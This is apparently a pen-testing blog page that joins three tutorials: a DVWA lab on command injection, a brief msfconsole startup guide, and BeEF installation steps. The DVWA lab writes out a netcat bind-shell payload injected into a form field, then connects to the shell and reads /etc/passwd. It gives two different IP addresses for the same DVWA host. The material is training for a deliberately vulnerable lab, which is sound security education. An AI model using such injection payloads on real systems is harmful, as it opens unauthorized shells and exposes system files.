Damn Vulnerable Web App (DVWA) | Command Injection Attack using NetCat

In this post we are going to cover Command Injection Attack using NetCat on Damn Vulnerable Web App.

Background:

• What is Damn Vulnerable Web App (DVWA)?
  • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
  • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
• What is Command Execution?
  • Command Execution is where a website application provides the ability to execute system commands.
• What is a Command Injection Attack?
  • The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.
  • In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it
    as an authorized system user.
  • Note, the commands are executed with the same privileges as the application and/or web server.
  • Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
• What is a Command Injection Listener Attack?
• A Command Injection Listener Attack is where a malicious user creates a backdoor listener using common network utilities such as netcat.
• Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP.
• Unix/Linux Example: 9.9.9.9;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Lab:

1) Access DVWA application on your browser.

2) Click on Command Injection

3) Pass below data as argument in text box and lick on submit. 

192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

• Make a FIFO named pipe.
• Pipes allow separate processes to communicate without having been designed explicitly to work together.
• This will allow two processes to connect to netcat.
• nc -l 4444, tells netcat to listen and allow connections on port 4444.
• 192.168.43.118 is IP address of DVWA applciation.

4) Point 3 will open a back door to access DVWA machine. 

5) Now Login to your Kali Linux machine.

6) Now Use NetCat on Kali Linux to access DVWA instance.

1. nc 192.168.43.209 4444
   • Use Kali Linux to Connect to DVWA Netcat session on port 4444
2. hostname
   • This is server hostname that hosts DVWA.
3. cat /etc/passwd
• Show content of the /etc/passwd file

Like this we can perform any operation on DVWA instance from Kali Linux as long as we have NetCat session running on DVWA machine. 

How to Start the Metasploit Framework Console (msfconsole) | Kali Linux | Pen Testing

In this tutorial we will cover on how to use Kali Linux to exploit Metasplitable3 VM.
We assume you have already Kali Linux and Metasploitable 3 on your Machine.

1) Start PostgreSQL DB on Kali Linux
service postgresql start

2) Check PostgreSQL service status
service postgresql status

3) Configure PostgreSQL for Metasploit

4) Start msfconsole

5) Check DB connection

6) You can search any module by running commands like below.
search module_name

BEEF Installation on Kali Linux

The following installation instructions are suitable for Linux based operating systems.

In theory, BeEF should work on any operating system which can run Ruby 2.5+ and NodeJS. However, only MacOS and Linux are officially supported.

You will not find MacOS installation instructions in this guide. They are currently high on the list of wiki tasks to be completed.

It's highly recommended that you use a Ruby Environment Manager when installing BeEF on Ubuntu, due to restricted permissions. Please note that you do not need to install Ruby as per the above instructions, if using Ruby Environment Manager.

In order to install BeEF and RVM you will need to install Git and Curl first, as they do not come out of the box with Ubuntu.

$ sudo apt-get install git
$ sudo apt-get install curl

To install RVM, firstly go to https://rvm.io/rvm/install and install the GPG keys. Then install RVM, without dependencies:

$ \curl -sSL https://get.rvm.io | bash -s -- --autolibs=install-packages 


Now install those dependencies as root while in the applications users $HOME directory:

$ sudo .rvm/bin/rvm requirements 


Now that the dependencies are installed we need to install the stable releases of both RVM and Ruby. As the application user enter:

$ \curl -sSL https://get.rvm.io | bash -s stable --ruby


BeEF requires Ruby 2.5.x. Before navigating to the beef directory run:

$ rvm install "ruby-2.5.3"


Then simply reload your shell!

You can verify your installation of RVM and Ruby by running:

$ rvm -v
$ ruby -v


After following the above steps, simply clone the repository and install BeEF as per below.

Source

Obtain application source code either by downloading the latest archive:
$ wget https://github.com/beefproject/beef/archive/master.zip


Or cloning the Git repository from Github:
$ git clone https://github.com/beefproject/beef


Installation

Once a suitable version of Ruby is installed, run the install script in the BeEF directory:
$ ./install


This script installs the required operating system packages and all the prerequisite Ruby gems.

If installation failed with rake not found error. Run below command.

gem install rake -v '13.0.1'

Upon successful installation, be sure to read the Configuration page on the wiki for important details on configuring and securing BeEF.

Start BeEF

To start BeEF, first change the username and password config.yaml and then simply run:
  $ ./beef